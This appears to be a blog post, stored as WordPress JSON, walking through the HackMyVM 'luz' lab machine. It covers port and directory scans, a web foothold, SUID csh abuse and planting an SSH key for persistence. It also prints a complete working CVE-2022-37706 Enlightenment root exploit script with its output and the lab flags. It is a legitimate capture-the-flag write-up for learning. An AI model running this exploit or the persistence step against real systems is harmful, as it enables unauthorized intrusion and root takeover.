{"id":639,"date":"2024-04-26T22:58:28","date_gmt":"2024-04-26T14:58:28","guid":{"rendered":"http:\/\/162.14.82.114\/?p=639"},"modified":"2024-04-26T22:58:28","modified_gmt":"2024-04-26T14:58:28","slug":"hmv-_-luz","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/639\/04\/26\/2024\/","title":{"rendered":"hmv[-_-]luz"},"content":{"rendered":"<h1>luz<\/h1>\n<p><div><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262256844.png\" alt=\"image-20240426204620059\" \/><\/div><br \/>\n<div><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262256440.png\" alt=\"image-20240426204729229\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ rustscan -a 192.168.0.158 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.158:22\nOpen 192.168.0.158:80\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\nWarning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex &#039;^HTTP\/1\\.1 \\d\\d\\d (?:[^\\r\\n]*\\r\\n(?!\\r\\n))*?.*\\r\\nServer: Virata-EmWeb\/R([\\d_]+)\\r\\nContent-Type: text\/html; ?charset=UTF-8\\r\\nExpires: .*&lt;title&gt;HP (Color |)LaserJet ([\\w._ -]+)&nbsp;&nbsp;&nbsp;&#039;\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-26 08:49 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nInitiating Ping Scan at 08:49\nScanning 192.168.0.158 [2 ports]\nCompleted Ping Scan at 08:49, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 08:49\nCompleted Parallel DNS resolution of 1 host. at 08:49, 0.00s elapsed\nDNS resolution of 1 IPs took 0.00s. 
Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 08:49\nScanning luz (192.168.0.158) [2 ports]\nDiscovered open port 80\/tcp on 192.168.0.158\nDiscovered open port 22\/tcp on 192.168.0.158\nCompleted Connect Scan at 08:49, 0.00s elapsed (2 total ports)\nInitiating Service scan at 08:49\nScanning 2 services on luz (192.168.0.158)\nCompleted Service scan at 08:49, 6.26s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.0.158.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.23s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nNmap scan report for luz (192.168.0.158)\nHost is up, received syn-ack (0.00038s latency).\nScanned at 2024-04-26 08:49:28 EDT for 7s\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 5f:9e:28:74:86:8e:d7:5b:bd:96:00:4b:d0:7f:56:e3 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJdeakQuX\/KhgJtCHKPXBvbBberybpFXyJCNY133fb6wXIblN9C0KqbjlK9F7dky5mhp2dvFNhQp7OyRp26Oq60=\n|   256 fb:3b:fd:9c:9f:4a:7c:8c:1e:a8:27:e2:8d:bf:2b:e5 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOse0b6oOXfVJOgCDyK93vOjbOlyMHaQyfx5V5aFOaor\n80\/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)\n| http-cookie-flags: \n|   \/: \n|     PHPSESSID: \n|_      httponly flag not set\n| http-methods: \n|_  Supported Methods: GET HEAD POST\n|_http-title: Site doesn&#039;t have a title (text\/html; charset=UTF-8).\n|_http-server-header: nginx\/1.18.0 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) 
scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 7.22 seconds<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.158 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.158\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,php,zip,bak,jpg,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 19059]\n\/home.php             (Status: 200) [Size: 8979]\n\/about.php            (Status: 200) [Size: 637]\n\/login.php            (Status: 200) [Size: 1579]\n\/header.php           (Status: 200) [Size: 1780]\n\/signup.php           (Status: 200) [Size: 2034]\n\/admin                (Status: 301) [Size: 178] [--&gt; http:\/\/192.168.0.158\/admin\/]\n\/assets               (Status: 301) [Size: 178] [--&gt; http:\/\/192.168.0.158\/assets\/]\n\/footer.php           (Status: 200) [Size: 2862]\n\/css 
                 (Status: 301) [Size: 178] [--&gt; http:\/\/192.168.0.158\/css\/]\n\/database             (Status: 301) [Size: 178] [--&gt; http:\/\/192.168.0.158\/database\/]\n\/js                   (Status: 301) [Size: 178] [--&gt; http:\/\/192.168.0.158\/js\/]\n\/head.php             (Status: 200) [Size: 0]\n\/checkout.php         (Status: 500) [Size: 0]\n\/readme.txt           (Status: 200) [Size: 1531]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257725.png\" alt=\"image-20240426205048816\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262256600.png\" alt=\"image-20240426205105385\" \/><\/p>\n<p>And the login page:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257428.png\" alt=\"image-20240426205141109\" \/><\/p>\n<p>There is also an admin login page:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257787.png\" alt=\"image-20240426205125729\" \/><\/p>\n<h3>Searching for Vulnerabilities<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257691.png\" alt=\"image-20240426222503714\" \/><\/p>\n<p>Attempting exploitation:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257290.png\" alt=\"image-20240426222602131\" \/><\/p>\n<p>Hmm..... to make this easier to work with, switch over:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262258475.png\" alt=\"image-20240426222858206\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262258982.png\" alt=\"image-20240426222911668\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@luz:\/var\/www\/html\/fos\/assets\/img$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@luz:\/var\/www\/html\/fos\/assets\/img$ sudo -l\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@luz:\/var\/www\/html\/fos\/assets\/img$ cd ..\/..\/..\/\n(remote) www-data@luz:\/var\/www\/html$ ls -la\ntotal 16\ndrwxr-xr-x 3 www-data www-data 4096 Jan 11  2023 .\ndrwxr-xr-x 3 root     root     4096 Jan 11  2023 ..\ndrwxr-xr-x 7 www-data www-data 4096 Jan 11  2023 fos\n-rw------- 
1 www-data www-data   15 Jan 11  2023 user.txt\n(remote) www-data@luz:\/var\/www\/html$ cat uesr\ncat: uesr: No such file or directory\n(remote) www-data@luz:\/var\/www\/html$ cat user.txt \nHMVn03145n4nk4\n(remote) www-data@luz:\/var\/www\/html$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/x86_64-linux-gnu\/enlightenment\/utils\/enlightenment_ckpasswd\n\/usr\/lib\/x86_64-linux-gnu\/enlightenment\/utils\/enlightenment_system\n\/usr\/lib\/x86_64-linux-gnu\/enlightenment\/utils\/enlightenment_sys\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/bin\/pkexec\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/bsd-csh\n\/usr\/bin\/fusermount3<\/code><\/pre>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/csh\/#suid\">https:\/\/gtfobins.github.io\/gtfobins\/csh\/#suid<\/a><\/p>\n<h3>Privilege Escalation via csh<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@luz:\/var\/www\/html$ \/usr\/bin\/bsd-csh -b\n% whoami;id\naelis\nuid=33(www-data) gid=33(www-data) euid=1000(aelis) egid=1000(aelis) groups=1000(aelis),33(www-data)<\/code><\/pre>\n<p>Try adding an SSH public key to log in:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ ssh-keygen -t rsa -f \/home\/kali\/temp\/luz\/aelis        \nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/luz\/aelis\nYour public key has been saved in \/home\/kali\/temp\/luz\/aelis.pub\nThe key fingerprint is:\nSHA256:MQD1vSSF7vACaSAxR2hN4BE5wY9vPBy58j+BblDSigc kali@kali\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|+OX..oo  ..      |\n|+Bo.   o.o       |\n|.o=... .= o      |\n|Eo *+ . 
.= .     |\n|..B.+. +S .      |\n|.+.O .. o        |\n| .* . ..         |\n|   + .           |\n|  . ...          |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ ls -la \ntotal 24\ndrwxr-xr-x  2 kali kali 4096 Apr 26 10:32 .\ndrwxr-xr-x 73 kali kali 4096 Apr 26 08:47 ..\n-rwxr-xr-x  1 kali kali 6702 Apr 26 10:25 50305.py\n-rw-------  1 kali kali 2590 Apr 26 10:32 aelis\n-rw-r--r--  1 kali kali  563 Apr 26 10:32 aelis.pub\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ cat aelis.pub                     \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBCybFDl8znQ+Hw2GxHKyYqibILjkP5Ix0a7F4XbBbGvNCYV7g6KzoxoHH+eWwocBkqEcD8BD8AJT9yMW\/1tGczskuQaA+yIfzYwoUpytEcxBQzGB\/PW0njrtp3vYW8q63nydtbKLa2Wktw3+OPwRn97osapvRWiauGY1PHoevDsPx8q\/1CU9sDrKX2M\/BhfvaaCAKPWOpzg6VdKEOkxygS+kaKAY4\/fn3mAsbOhn6xT7hpjQTM3q9o9g+1uB9ZnGeBXPTncpcp+0FlBjUsdrZ4BuAp8EJ2Gsxrk53iFd1PmUySdEOeo0W25sKO5ZMQEmcS35m0LdVGvHjn\/FYAHTU1NNMowquFR6BEK8J\/LxBd\/xeD0fQmE6JaB4RTUVVR1M3Pn7+frcBgwEdMIPtc0uSRDLX8GYOn2A514Pcxe26i5+w6gyKBsh4vkkAr0UQXrZSY96YezRqbEW9G+m7ytWMGKf8EkmF2Wz+E366J81+2dERxPwuZs2SZoKDdd3tHuM= kali@kali<\/code><\/pre>\n<pre><code class=\"language-bash\">% cd \/home\n% ls\naelis\n% cd aelis\n% ls -la\ntotal 12168\ndrwxr-x--- 5 aelis aelis     4096 Jan 11  2023 .\ndrwxr-xr-x 3 root  root      4096 Jan 11  2023 ..\n-rw------- 1 aelis aelis       49 Jan 11  2023 .Xauthority\nlrwxrwxrwx 1 aelis aelis        9 Jan 11  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 aelis aelis      220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 aelis aelis     3771 Jan  6  2022 .bashrc\ndrwx------ 2 aelis aelis     4096 Jan 11  2023 .cache\ndrwxrwxr-x 3 aelis aelis     4096 Jan 11  2023 .local\n-rw-r--r-- 1 aelis aelis      807 Jan  6  2022 .profile\ndrwx------ 2 aelis aelis     4096 Jan 11  2023 .ssh\n-rw-r--r-- 1 aelis aelis        0 Jan 11  2023 .sudo_as_admin_successful\n-rw-r--r-- 1 aelis aelis 12421945 Jan 11  2023 php-fos-db.zip\n% cd .ssh\n% ls 
-la\ntotal 8\ndrwx------ 2 aelis aelis 4096 Jan 11  2023 .\ndrwxr-x--- 5 aelis aelis 4096 Jan 11  2023 ..\n-rw------- 1 aelis aelis    0 Jan 11  2023 authorized_keys\n% echo &#039;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBCybFDl8znQ+Hw2GxHKyYqibILjkP5Ix0a7F4XbBbGvNCYV7g6KzoxoHH+eWwocBkqEcD8BD8AJT9yMW\/1tGczskuQaA+yIfzYwoUpytEcxBQzGB\/PW0njrtp3vYW8q63nydtbKLa2Wktw3+OPwRn97osapvRWiauGY1PHoevDsPx8q\/1CU9sDrKX2M\/BhfvaaCAKPWOpzg6VdKEOkxygS+kaKAY4\/fn3mAsbOhn6xT7hpjQTM3q9o9g+1uB9ZnGeBXPTncpcp+0FlBjUsdrZ4BuAp8EJ2Gsxrk53iFd1PmUySdEOeo0W25sKO5ZMQEmcS35m0LdVGvHjn\/FYAHTU1NNMowquFR6BEK8J\/LxBd\/xeD0fQmE6JaB4RTUVVR1M3Pn7+frcBgwEdMIPtc0uSRDLX8GYOn2A514Pcxe26i5+w6gyKBsh4vkkAr0UQXrZSY96YezRqbEW9G+m7ytWMGKf8EkmF2Wz+E366J81+2dERxPwuZs2SZoKDdd3tHuM= kali@kali&#039; &gt; authorized_keys<\/code><\/pre>\n<p>Try logging in:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ chmod 600 aelis     \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ ssh aelis@192.168.0.158 -i aelis\nThe authenticity of host &#039;192.168.0.158 (192.168.0.158)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:zJ98VzyiXBPwPbYm8Ka23HQda6fosh\/uoEbrEkCKYhE.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? 
yes\nWarning: Permanently added &#039;192.168.0.158&#039; (ED25519) to the list of known hosts.\nWelcome to Ubuntu 22.04.1 LTS (GNU\/Linux 5.15.0-57-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of vie 26 abr 2024 14:35:42 UTC\n\n  System load:  0.080078125       Processes:               112\n  Usage of \/:   63.1% of 7.77GB   Users logged in:         0\n  Memory usage: 55%               IPv4 address for enp0s3: 192.168.0.158\n  Swap usage:   0%\n\n108 updates can be applied immediately.\n56 of these updates are standard security updates.\nTo see these additional updates run: apt list --upgradable\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nLast login: Thu Jan 12 07:30:36 2023\naelis@luz:~$ <\/code><\/pre>\n<h3>Attempting Escalation to root<\/h3>\n<pre><code class=\"language-bash\">aelis@luz:~$ ls -la\ntotal 12168\ndrwxr-x--- 5 aelis aelis     4096 ene 11  2023 .\ndrwxr-xr-x 3 root  root      4096 ene 11  2023 ..\nlrwxrwxrwx 1 aelis aelis        9 ene 11  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 aelis aelis      220 ene  6  2022 .bash_logout\n-rw-r--r-- 1 aelis aelis     3771 ene  6  2022 .bashrc\ndrwx------ 2 aelis aelis     4096 ene 11  2023 .cache\ndrwxrwxr-x 3 aelis aelis     4096 ene 11  2023 .local\n-rw-r--r-- 1 aelis aelis 12421945 ene 11  2023 php-fos-db.zip\n-rw-r--r-- 1 aelis aelis      807 ene  6  2022 .profile\ndrwx------ 2 aelis aelis     4096 ene 11  2023 .ssh\n-rw-r--r-- 1 aelis aelis        0 ene 11  2023 .sudo_as_admin_successful\n-rw------- 1 aelis aelis       49 ene 11  2023 .Xauthority\naelis@luz:~$ sudo -l\n[sudo] password for aelis: \nsudo: a password is required\naelis@luz:~$ find \/ -perm -u=s -type f 
2&gt;\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/x86_64-linux-gnu\/enlightenment\/utils\/enlightenment_ckpasswd\n\/usr\/lib\/x86_64-linux-gnu\/enlightenment\/utils\/enlightenment_system\n\/usr\/lib\/x86_64-linux-gnu\/enlightenment\/utils\/enlightenment_sys\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/bin\/pkexec\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/bsd-csh\n\/usr\/bin\/fusermount3\naelis@luz:~$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep\n\/usr\/bin\/mtr-packet cap_net_raw=ep\n\/usr\/bin\/ping cap_net_raw=ep<\/code><\/pre>\n<p>Take a look at these unusual <code>suid<\/code> binaries:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262258561.png\" alt=\"image-20240426224638440\" \/><\/p>\n<p>Attempting exploitation:<\/p>\n<pre><code class=\"language-shell\">#!\/bin\/bash\n\necho &quot;CVE-2022-37706&quot;\necho &quot;[*] Trying to find the vulnerable SUID file...&quot;\necho &quot;[*] This may take few seconds...&quot;\n\nfile=$(find \/ -name enlightenment_sys 
-perm -4000 2&gt;\/dev\/null | head -1)\nif [[ -z ${file} ]]\nthen\n    echo &quot;[-] Couldn&#039;t find the vulnerable SUID file...&quot;\n    echo &quot;[*] Enlightenment should be installed on your system.&quot;\n    exit 1\nfi\n\necho &quot;[+] Vulnerable SUID binary found!&quot;\necho &quot;[+] Trying to pop a root shell!&quot;\nmkdir -p \/tmp\/net\nmkdir -p &quot;\/dev\/..\/tmp\/;\/tmp\/exploit&quot;\n\necho &quot;\/bin\/sh&quot; &gt; \/tmp\/exploit\nchmod a+x \/tmp\/exploit\necho &quot;[+] Enjoy the root shell :)&quot;\n${file} \/bin\/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), &quot;\/dev\/..\/tmp\/;\/tmp\/exploit&quot; \/tmp\/\/\/net<\/code><\/pre>\n<pre><code class=\"language-bash\">aelis@luz:\/tmp$ vim pwn.sh\naelis@luz:\/tmp$ chmod +x pwn.sh \naelis@luz:\/tmp$ .\/pwn.sh \nCVE-2022-37706\n[*] Trying to find the vulnerable SUID file...\n[*] This may take few seconds...\n[+] Vulnerable SUID binary found!\n[+] Trying to pop a root shell!\n[+] Enjoy the root shell :)\nmount: \/dev\/..\/tmp\/: can&#039;t find in \/etc\/fstab.\n# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),1000(aelis)\n# cd \/root\n# ls -la\ntotal 40\ndrwx------  6 root root  4096 Apr 26 14:49 .\ndrwxr-xr-x 19 root root  4096 Jan 11  2023 ..\nlrwxrwxrwx  1 root root     9 Jan 11  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  3106 Oct 15  2021 .bashrc\ndrwxr-xr-x  3 root root  4096 Jan 11  2023 .local\n-rw-------  1 root root   520 Jan 11  2023 .mysql_history\n-rw-r--r--  1 root root   161 Jul  9  2019 .profile\ndrwx------  2 root aelis 4096 Apr 26 14:49 .run\ndrwx------  2 root root  4096 Jan 11  2023 .ssh\n-rw-------  1 root root    17 Jan 11  2023 root.txt\ndrwx------  3 root root  4096 Jan 11  2023 snap\n# cat root.txt\nHMV3nl1gth3nm3n7<\/code><\/pre>\n<p>Got the flag!!!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>luz Information Gathering 
Port Scan \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz] \u2514\u2500$ rustscan  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-639","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/639","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=639"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/639\/revisions"}],"predecessor-version":[{"id":640,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/639\/revisions\/640"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=639"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=639"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=639"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}